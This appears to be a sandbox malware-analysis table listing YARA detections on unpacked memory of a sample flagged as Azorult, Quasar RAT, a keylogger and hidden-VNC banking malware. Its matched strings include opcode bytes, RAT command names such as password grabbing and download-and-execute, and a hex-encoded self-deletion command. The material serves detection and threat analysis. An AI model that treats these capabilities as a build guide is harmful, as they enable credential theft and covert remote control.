1.3.CVbJSUXraQ.exe.3800000.6.raw.unpack	JoeSecurity_Azorult_1	Yara detected Azorult	Joe Security
1.3.CVbJSUXraQ.exe.3800000.6.raw.unpack	Azorult_1	Azorult Payload	kevoreilly	0x17f53:$code1: C7 07 3C 00 00 00 8D 45 80 89 47 04 C7 47 08 20 00 00 00 8D 85 80 FE FF FF 89 47 10 C7 47 14 00 01 00 00 8D 85 00 FE FF FF 89 47 1C C7 47 20 80 00 00 00 8D 85 80 FD FF FF 89 47 24 C7 47 28 80 ... 0x12c7c:$string1: SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch")
1.0.CVbJSUXraQ.exe.ee5bac.3.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
1.0.CVbJSUXraQ.exe.ee5bac.3.unpack	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
7.2.CVbJSUXraQ.exe.f14fac.2.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
7.2.CVbJSUXraQ.exe.f14fac.2.unpack	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
10.3.SystemPropertiesPerformance.exe.5ce45cc.6.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
10.3.SystemPropertiesPerformance.exe.5ce45cc.6.unpack	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
4.2.vnc.exe.ab6000.1.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
4.2.vnc.exe.ab6000.1.unpack	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
10.3.SystemPropertiesPerformance.exe.187c7b0.3.raw.unpack	crime_win32_hvnc_banker_gen	Detects malware banker hidden VNC	@VK_Intel
10.3.SystemPropertiesPerformance.exe.187c7b0.3.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
10.3.SystemPropertiesPerformance.exe.187c7b0.3.raw.unpack	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
10.3.SystemPropertiesPerformance.exe.187c7b0.3.raw.unpack	crime_win32_hvnc_zloader1_hvnc_generic	Detects Zloader hidden VNC	@VK_Intel
7.2.CVbJSUXraQ.exe.ee5bac.4.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
7.2.CVbJSUXraQ.exe.ee5bac.4.unpack	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
7.2.CVbJSUXraQ.exe.400000.0.unpack	JoeSecurity_Azorult	Yara detected Azorult Info Stealer	Joe Security
7.2.CVbJSUXraQ.exe.400000.0.unpack	JoeSecurity_Azorult_1	Yara detected Azorult	Joe Security
7.2.CVbJSUXraQ.exe.400000.0.unpack	Azorult_1	Azorult Payload	kevoreilly	0x17353:$code1: C7 07 3C 00 00 00 8D 45 80 89 47 04 C7 47 08 20 00 00 00 8D 85 80 FE FF FF 89 47 10 C7 47 14 00 01 00 00 8D 85 00 FE FF FF 89 47 1C C7 47 20 80 00 00 00 8D 85 80 FD FF FF 89 47 24 C7 47 28 80 ... 0x1207c:$string1: SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch")
5.0.svchost.exe.c9ac50.8.raw.unpack	crime_win32_hvnc_banker_gen	Detects malware banker hidden VNC	@VK_Intel
5.0.svchost.exe.c9ac50.8.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
5.0.svchost.exe.c9ac50.8.raw.unpack	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
5.0.svchost.exe.c9ac50.8.raw.unpack	crime_win32_hvnc_zloader1_hvnc_generic	Detects Zloader hidden VNC	@VK_Intel
10.0.SystemPropertiesPerformance.exe.b75bac.1.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
10.0.SystemPropertiesPerformance.exe.b75bac.1.unpack	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
10.0.SystemPropertiesPerformance.exe.b79fac.2.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
10.0.SystemPropertiesPerformance.exe.b79fac.2.unpack	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
5.0.svchost.exe.cc5c50.7.raw.unpack	crime_win32_hvnc_banker_gen	Detects malware banker hidden VNC	@VK_Intel
5.0.svchost.exe.cc5c50.7.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
5.0.svchost.exe.cc5c50.7.raw.unpack	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
5.0.svchost.exe.cc5c50.7.raw.unpack	crime_win32_hvnc_zloader1_hvnc_generic	Detects Zloader hidden VNC	@VK_Intel
10.2.SystemPropertiesPerformance.exe.ba4fac.3.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
10.2.SystemPropertiesPerformance.exe.ba4fac.3.unpack	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
5.2.svchost.exe.cc5c50.2.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
5.2.svchost.exe.cc5c50.2.unpack	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.unpack	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
5.0.svchost.exe.c60000.0.unpack	crime_win32_hvnc_banker_gen	Detects malware banker hidden VNC	@VK_Intel
5.0.svchost.exe.c60000.0.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
5.0.svchost.exe.c60000.0.unpack	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
5.0.svchost.exe.c60000.0.unpack	crime_win32_hvnc_zloader1_hvnc_generic	Detects Zloader hidden VNC	@VK_Intel
10.0.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack	Vermin_Keylogger_Jan18_1	Detects Vermin Keylogger	Florian Roth	0x7b8f4:$x3: GetKeyloggerLogsResponse 0x7bdea:$x4: GetKeyloggerLogs 0x7c0b1:$s1: <RunHidden>k__BackingField 0x7babc:$s2: set_SystemInfos 0x7c0da:$s3: set_RunHidden 0x7bce8:$s4: set_RemotePath 0x8cdf8:$s6: Client.exe 0x8ce60:$s6: Client.exe 0x8115b:$s7: xClient.Core.ReverseProxy.Packets
10.0.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack	crime_win32_hvnc_banker_gen	Detects malware banker hidden VNC	@VK_Intel
10.0.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack	xRAT_1	Detects Patchwork malware	Florian Roth	0x66c28:$x4: xClient.Properties.Resources.resources 0x66ae9:$s4: Client.exe 0x7c0da:$s7: set_RunHidden
10.0.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack	Quasar_RAT_1	Detects Quasar RAT	Florian Roth	0x7c09e:$s1: DoUploadAndExecute 0x819b5:$s2: DoDownloadAndExecute 0x7be74:$s3: DoShellExecute 0x7c296:$s4: set_Processname 0x4a630:$op1: 04 1E FE 02 04 16 FE 01 60 0x4a554:$op2: 00 17 03 1F 20 17 19 15 28 0x4afc1:$op3: 00 04 03 69 91 1B 40 0x4b820:$op3: 00 04 03 69 91 1B 40
10.0.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack	Quasar_RAT_2	Detects Quasar RAT	Florian Roth	0x7b8f4:$x1: GetKeyloggerLogsResponse 0x7bb34:$s1: DoShellExecuteResponse 0x74f22:$s2: GetPasswordsResponse 0x7ba07:$s3: GetStartupItemsResponse 0x721f0:$s4: <GetGenReader>b__7 0x7c0b2:$s5: RunHidden 0x7c0d0:$s5: RunHidden 0x7c0de:$s5: RunHidden 0x7c0f2:$s5: RunHidden
10.0.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack	MAL_QuasarRAT_May19_1	Detects QuasarRAT malware	Florian Roth	0x849cc:$xc2: 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20 00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C 00 68 00 6F 00 73 00 74 00 20 00 3E 00 20 00 6E 00 75 00 6C 00 0D 00 0A 00 64 00 65 00 6C 00 20 ...
10.0.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack	CN_disclosed_20180208_KeyLogger_1	Detects malware from disclosed CN malware set	Florian Roth	0x84790:$x2: Process already elevated. 0x7d2ef:$x4: get_encryptedPassword 0x819b5:$x5: DoDownloadAndExecute
10.0.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
10.0.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
10.0.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
10.0.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack	crime_win32_hvnc_zloader1_hvnc_generic	Detects Zloader hidden VNC	@VK_Intel
7.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack	crime_win32_hvnc_banker_gen	Detects malware banker hidden VNC	@VK_Intel
7.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack	xRAT_1	Detects Patchwork malware	Florian Roth	0x91c28:$x4: xClient.Properties.Resources.resources 0x91ae9:$s4: Client.exe 0xa70da:$s7: set_RunHidden
7.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack	Quasar_RAT_1	Detects Quasar RAT	Florian Roth	0xa709e:$s1: DoUploadAndExecute 0xac9b5:$s2: DoDownloadAndExecute 0xa6e74:$s3: DoShellExecute 0xa7296:$s4: set_Processname 0x75630:$op1: 04 1E FE 02 04 16 FE 01 60 0x75554:$op2: 00 17 03 1F 20 17 19 15 28 0x75fc1:$op3: 00 04 03 69 91 1B 40 0x76820:$op3: 00 04 03 69 91 1B 40
7.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack	Quasar_RAT_2	Detects Quasar RAT	Florian Roth	0xa68f4:$x1: GetKeyloggerLogsResponse 0xa6b34:$s1: DoShellExecuteResponse 0x9ff22:$s2: GetPasswordsResponse 0xa6a07:$s3: GetStartupItemsResponse 0x9d1f0:$s4: <GetGenReader>b__7 0xa70b2:$s5: RunHidden 0xa70d0:$s5: RunHidden 0xa70de:$s5: RunHidden 0xa70f2:$s5: RunHidden
7.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack	MAL_QuasarRAT_May19_1	Detects QuasarRAT malware	Florian Roth	0xaf9cc:$xc2: 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20 00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C 00 68 00 6F 00 73 00 74 00 20 00 3E 00 20 00 6E 00 75 00 6C 00 0D 00 0A 00 64 00 65 00 6C 00 20 ...
7.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack	CN_disclosed_20180208_KeyLogger_1	Detects malware from disclosed CN malware set	Florian Roth	0xaf790:$x2: Process already elevated. 0xa82ef:$x4: get_encryptedPassword 0xac9b5:$x5: DoDownloadAndExecute
7.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
7.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
7.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
7.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack	crime_win32_hvnc_zloader1_hvnc_generic	Detects Zloader hidden VNC	@VK_Intel
4.0.vnc.exe.ab0000.0.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
4.0.vnc.exe.ab0000.0.unpack	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
5.0.svchost.exe.cc5c50.1.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
5.0.svchost.exe.cc5c50.1.unpack	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
7.2.CVbJSUXraQ.exe.ee5bac.4.raw.unpack	xRAT_1	Detects Patchwork malware	Florian Roth	0x96028:$x4: xClient.Properties.Resources.resources 0x95ee9:$s4: Client.exe 0xab4da:$s7: set_RunHidden
7.2.CVbJSUXraQ.exe.ee5bac.4.raw.unpack	Quasar_RAT_1	Detects Quasar RAT	Florian Roth	0xab49e:$s1: DoUploadAndExecute 0xb0db5:$s2: DoDownloadAndExecute 0xab274:$s3: DoShellExecute 0xab696:$s4: set_Processname 0x79a30:$op1: 04 1E FE 02 04 16 FE 01 60 0x79954:$op2: 00 17 03 1F 20 17 19 15 28 0x7a3c1:$op3: 00 04 03 69 91 1B 40 0x7ac20:$op3: 00 04 03 69 91 1B 40
7.2.CVbJSUXraQ.exe.ee5bac.4.raw.unpack	Quasar_RAT_2	Detects Quasar RAT	Florian Roth	0xaacf4:$x1: GetKeyloggerLogsResponse 0xaaf34:$s1: DoShellExecuteResponse 0xa4322:$s2: GetPasswordsResponse 0xaae07:$s3: GetStartupItemsResponse 0xa15f0:$s4: <GetGenReader>b__7 0xab4b2:$s5: RunHidden 0xab4d0:$s5: RunHidden 0xab4de:$s5: RunHidden 0xab4f2:$s5: RunHidden
7.2.CVbJSUXraQ.exe.ee5bac.4.raw.unpack	MAL_QuasarRAT_May19_1	Detects QuasarRAT malware	Florian Roth	0xb3dcc:$xc2: 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20 00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C 00 68 00 6F 00 73 00 74 00 20 00 3E 00 20 00 6E 00 75 00 6C 00 0D 00 0A 00 64 00 65 00 6C 00 20 ...
7.2.CVbJSUXraQ.exe.ee5bac.4.raw.unpack	CN_disclosed_20180208_KeyLogger_1	Detects malware from disclosed CN malware set	Florian Roth	0xb3b90:$x2: Process already elevated. 0xac6ef:$x4: get_encryptedPassword 0xb0db5:$x5: DoDownloadAndExecute
7.2.CVbJSUXraQ.exe.ee5bac.4.raw.unpack	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
7.2.CVbJSUXraQ.exe.ee5bac.4.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
7.2.CVbJSUXraQ.exe.ee5bac.4.raw.unpack	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
5.0.svchost.exe.cc5c50.4.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
5.0.svchost.exe.cc5c50.4.unpack	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
10.2.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack	crime_win32_hvnc_banker_gen	Detects malware banker hidden VNC	@VK_Intel
10.2.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack	xRAT_1	Detects Patchwork malware	Florian Roth	0x91c28:$x4: xClient.Properties.Resources.resources 0x91ae9:$s4: Client.exe 0xa70da:$s7: set_RunHidden
10.2.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack	Quasar_RAT_1	Detects Quasar RAT	Florian Roth	0xa709e:$s1: DoUploadAndExecute 0xac9b5:$s2: DoDownloadAndExecute 0xa6e74:$s3: DoShellExecute 0xa7296:$s4: set_Processname 0x75630:$op1: 04 1E FE 02 04 16 FE 01 60 0x75554:$op2: 00 17 03 1F 20 17 19 15 28 0x75fc1:$op3: 00 04 03 69 91 1B 40 0x76820:$op3: 00 04 03 69 91 1B 40
10.2.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack	Quasar_RAT_2	Detects Quasar RAT	Florian Roth	0xa68f4:$x1: GetKeyloggerLogsResponse 0xa6b34:$s1: DoShellExecuteResponse 0x9ff22:$s2: GetPasswordsResponse 0xa6a07:$s3: GetStartupItemsResponse 0x9d1f0:$s4: <GetGenReader>b__7 0xa70b2:$s5: RunHidden 0xa70d0:$s5: RunHidden 0xa70de:$s5: RunHidden 0xa70f2:$s5: RunHidden
10.2.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack	MAL_QuasarRAT_May19_1	Detects QuasarRAT malware	Florian Roth	0xaf9cc:$xc2: 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20 00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C 00 68 00 6F 00 73 00 74 00 20 00 3E 00 20 00 6E 00 75 00 6C 00 0D 00 0A 00 64 00 65 00 6C 00 20 ...
10.2.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack	CN_disclosed_20180208_KeyLogger_1	Detects malware from disclosed CN malware set	Florian Roth	0xaf790:$x2: Process already elevated. 0xa82ef:$x4: get_encryptedPassword 0xac9b5:$x5: DoDownloadAndExecute
10.2.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
10.2.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
10.2.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
10.2.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack	crime_win32_hvnc_zloader1_hvnc_generic	Detects Zloader hidden VNC	@VK_Intel
10.3.SystemPropertiesPerformance.exe.1924408.0.raw.unpack	crime_win32_hvnc_banker_gen	Detects malware banker hidden VNC	@VK_Intel
10.3.SystemPropertiesPerformance.exe.1924408.0.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
10.3.SystemPropertiesPerformance.exe.1924408.0.raw.unpack	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
10.3.SystemPropertiesPerformance.exe.1924408.0.raw.unpack	crime_win32_hvnc_zloader1_hvnc_generic	Detects Zloader hidden VNC	@VK_Intel
1.2.CVbJSUXraQ.exe.ee5bac.2.raw.unpack	xRAT_1	Detects Patchwork malware	Florian Roth	0x96028:$x4: xClient.Properties.Resources.resources 0x95ee9:$s4: Client.exe 0xab4da:$s7: set_RunHidden
1.2.CVbJSUXraQ.exe.ee5bac.2.raw.unpack	Quasar_RAT_1	Detects Quasar RAT	Florian Roth	0xab49e:$s1: DoUploadAndExecute 0xb0db5:$s2: DoDownloadAndExecute 0xab274:$s3: DoShellExecute 0xab696:$s4: set_Processname 0x79a30:$op1: 04 1E FE 02 04 16 FE 01 60 0x79954:$op2: 00 17 03 1F 20 17 19 15 28 0x7a3c1:$op3: 00 04 03 69 91 1B 40 0x7ac20:$op3: 00 04 03 69 91 1B 40
1.2.CVbJSUXraQ.exe.ee5bac.2.raw.unpack	Quasar_RAT_2	Detects Quasar RAT	Florian Roth	0xaacf4:$x1: GetKeyloggerLogsResponse 0xaaf34:$s1: DoShellExecuteResponse 0xa4322:$s2: GetPasswordsResponse 0xaae07:$s3: GetStartupItemsResponse 0xa15f0:$s4: <GetGenReader>b__7 0xab4b2:$s5: RunHidden 0xab4d0:$s5: RunHidden 0xab4de:$s5: RunHidden 0xab4f2:$s5: RunHidden
1.2.CVbJSUXraQ.exe.ee5bac.2.raw.unpack	MAL_QuasarRAT_May19_1	Detects QuasarRAT malware	Florian Roth	0xb3dcc:$xc2: 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20 00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C 00 68 00 6F 00 73 00 74 00 20 00 3E 00 20 00 6E 00 75 00 6C 00 0D 00 0A 00 64 00 65 00 6C 00 20 ...
1.2.CVbJSUXraQ.exe.ee5bac.2.raw.unpack	CN_disclosed_20180208_KeyLogger_1	Detects malware from disclosed CN malware set	Florian Roth	0xb3b90:$x2: Process already elevated. 0xac6ef:$x4: get_encryptedPassword 0xb0db5:$x5: DoDownloadAndExecute
1.2.CVbJSUXraQ.exe.ee5bac.2.raw.unpack	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
1.2.CVbJSUXraQ.exe.ee5bac.2.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
1.2.CVbJSUXraQ.exe.ee5bac.2.raw.unpack	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
1.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack	crime_win32_hvnc_banker_gen	Detects malware banker hidden VNC	@VK_Intel
1.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack	xRAT_1	Detects Patchwork malware	Florian Roth	0x91c28:$x4: xClient.Properties.Resources.resources 0x91ae9:$s4: Client.exe 0xa70da:$s7: set_RunHidden
1.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack	Quasar_RAT_1	Detects Quasar RAT	Florian Roth	0xa709e:$s1: DoUploadAndExecute 0xac9b5:$s2: DoDownloadAndExecute 0xa6e74:$s3: DoShellExecute 0xa7296:$s4: set_Processname 0x75630:$op1: 04 1E FE 02 04 16 FE 01 60 0x75554:$op2: 00 17 03 1F 20 17 19 15 28 0x75fc1:$op3: 00 04 03 69 91 1B 40 0x76820:$op3: 00 04 03 69 91 1B 40
1.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack	Quasar_RAT_2	Detects Quasar RAT	Florian Roth	0xa68f4:$x1: GetKeyloggerLogsResponse 0xa6b34:$s1: DoShellExecuteResponse 0x9ff22:$s2: GetPasswordsResponse 0xa6a07:$s3: GetStartupItemsResponse 0x9d1f0:$s4: <GetGenReader>b__7 0xa70b2:$s5: RunHidden 0xa70d0:$s5: RunHidden 0xa70de:$s5: RunHidden 0xa70f2:$s5: RunHidden
1.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack	MAL_QuasarRAT_May19_1	Detects QuasarRAT malware	Florian Roth	0xaf9cc:$xc2: 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20 00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C 00 68 00 6F 00 73 00 74 00 20 00 3E 00 20 00 6E 00 75 00 6C 00 0D 00 0A 00 64 00 65 00 6C 00 20 ...
1.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack	CN_disclosed_20180208_KeyLogger_1	Detects malware from disclosed CN malware set	Florian Roth	0xaf790:$x2: Process already elevated. 0xa82ef:$x4: get_encryptedPassword 0xac9b5:$x5: DoDownloadAndExecute
1.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
1.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
1.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
1.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack	crime_win32_hvnc_zloader1_hvnc_generic	Detects Zloader hidden VNC	@VK_Intel
5.2.svchost.exe.c60000.0.unpack	crime_win32_hvnc_banker_gen	Detects malware banker hidden VNC	@VK_Intel
5.2.svchost.exe.c60000.0.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
5.2.svchost.exe.c60000.0.unpack	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
5.2.svchost.exe.c60000.0.unpack	crime_win32_hvnc_zloader1_hvnc_generic	Detects Zloader hidden VNC	@VK_Intel
4.0.vnc.exe.ab6000.1.raw.unpack	crime_win32_hvnc_banker_gen	Detects malware banker hidden VNC	@VK_Intel
4.0.vnc.exe.ab6000.1.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
4.0.vnc.exe.ab6000.1.raw.unpack	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
4.0.vnc.exe.ab6000.1.raw.unpack	crime_win32_hvnc_zloader1_hvnc_generic	Detects Zloader hidden VNC	@VK_Intel
5.0.svchost.exe.c60000.3.unpack	crime_win32_hvnc_banker_gen	Detects malware banker hidden VNC	@VK_Intel
5.0.svchost.exe.c60000.3.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
5.0.svchost.exe.c60000.3.unpack	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
5.0.svchost.exe.c60000.3.unpack	crime_win32_hvnc_zloader1_hvnc_generic	Detects Zloader hidden VNC	@VK_Intel
10.3.SystemPropertiesPerformance.exe.14d0000.4.raw.unpack	JoeSecurity_Azorult	Yara detected Azorult Info Stealer	Joe Security
10.3.SystemPropertiesPerformance.exe.14d0000.4.raw.unpack	JoeSecurity_Azorult_1	Yara detected Azorult	Joe Security
10.3.SystemPropertiesPerformance.exe.14d0000.4.raw.unpack	Azorult_1	Azorult Payload	kevoreilly	0x17f53:$code1: C7 07 3C 00 00 00 8D 45 80 89 47 04 C7 47 08 20 00 00 00 8D 85 80 FE FF FF 89 47 10 C7 47 14 00 01 00 00 8D 85 00 FE FF FF 89 47 1C C7 47 20 80 00 00 00 8D 85 80 FD FF FF 89 47 24 C7 47 28 80 ... 0x12c7c:$string1: SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch")
5.0.svchost.exe.c60000.3.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
5.0.svchost.exe.c60000.3.raw.unpack	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
7.2.CVbJSUXraQ.exe.f14fac.2.raw.unpack	Vermin_Keylogger_Jan18_1	Detects Vermin Keylogger	Florian Roth	0x7b8f4:$x3: GetKeyloggerLogsResponse 0x7bdea:$x4: GetKeyloggerLogs 0x7c0b1:$s1: <RunHidden>k__BackingField 0x7babc:$s2: set_SystemInfos 0x7c0da:$s3: set_RunHidden 0x7bce8:$s4: set_RemotePath 0x8cdf8:$s6: Client.exe 0x8ce60:$s6: Client.exe 0x8115b:$s7: xClient.Core.ReverseProxy.Packets
7.2.CVbJSUXraQ.exe.f14fac.2.raw.unpack	crime_win32_hvnc_banker_gen	Detects malware banker hidden VNC	@VK_Intel
7.2.CVbJSUXraQ.exe.f14fac.2.raw.unpack	xRAT_1	Detects Patchwork malware	Florian Roth	0x66c28:$x4: xClient.Properties.Resources.resources 0x66ae9:$s4: Client.exe 0x7c0da:$s7: set_RunHidden
7.2.CVbJSUXraQ.exe.f14fac.2.raw.unpack	Quasar_RAT_1	Detects Quasar RAT	Florian Roth	0x7c09e:$s1: DoUploadAndExecute 0x819b5:$s2: DoDownloadAndExecute 0x7be74:$s3: DoShellExecute 0x7c296:$s4: set_Processname 0x4a630:$op1: 04 1E FE 02 04 16 FE 01 60 0x4a554:$op2: 00 17 03 1F 20 17 19 15 28 0x4afc1:$op3: 00 04 03 69 91 1B 40 0x4b820:$op3: 00 04 03 69 91 1B 40
7.2.CVbJSUXraQ.exe.f14fac.2.raw.unpack	Quasar_RAT_2	Detects Quasar RAT	Florian Roth	0x7b8f4:$x1: GetKeyloggerLogsResponse 0x7bb34:$s1: DoShellExecuteResponse 0x74f22:$s2: GetPasswordsResponse 0x7ba07:$s3: GetStartupItemsResponse 0x721f0:$s4: <GetGenReader>b__7 0x7c0b2:$s5: RunHidden 0x7c0d0:$s5: RunHidden 0x7c0de:$s5: RunHidden 0x7c0f2:$s5: RunHidden
7.2.CVbJSUXraQ.exe.f14fac.2.raw.unpack	MAL_QuasarRAT_May19_1	Detects QuasarRAT malware	Florian Roth	0x849cc:$xc2: 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20 00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C 00 68 00 6F 00 73 00 74 00 20 00 3E 00 20 00 6E 00 75 00 6C 00 0D 00 0A 00 64 00 65 00 6C 00 20 ...
7.2.CVbJSUXraQ.exe.f14fac.2.raw.unpack	CN_disclosed_20180208_KeyLogger_1	Detects malware from disclosed CN malware set	Florian Roth	0x84790:$x2: Process already elevated. 0x7d2ef:$x4: get_encryptedPassword 0x819b5:$x5: DoDownloadAndExecute
7.2.CVbJSUXraQ.exe.f14fac.2.raw.unpack	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
7.2.CVbJSUXraQ.exe.f14fac.2.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
7.2.CVbJSUXraQ.exe.f14fac.2.raw.unpack	JoeSecurity_ramnitvncmodule	Yara detected Ramnit VNC Module	Joe Security
7.2.CVbJSUXraQ.exe.f14fac.2.raw.unpack	crime_win32_hvnc_zloader1_hvnc_generic	Detects Zloader hidden VNC	@VK_Intel
10.3.SystemPropertiesPerformance.exe.5ce01cc.5.raw.unpack	xRAT_1	Detects Patchwork malware	Florian Roth	0x96028:$x4: xClient.Properties.Resources.resources 0x95ee9:$s4: Client.exe 0xab4da:$s7: set_RunHidden
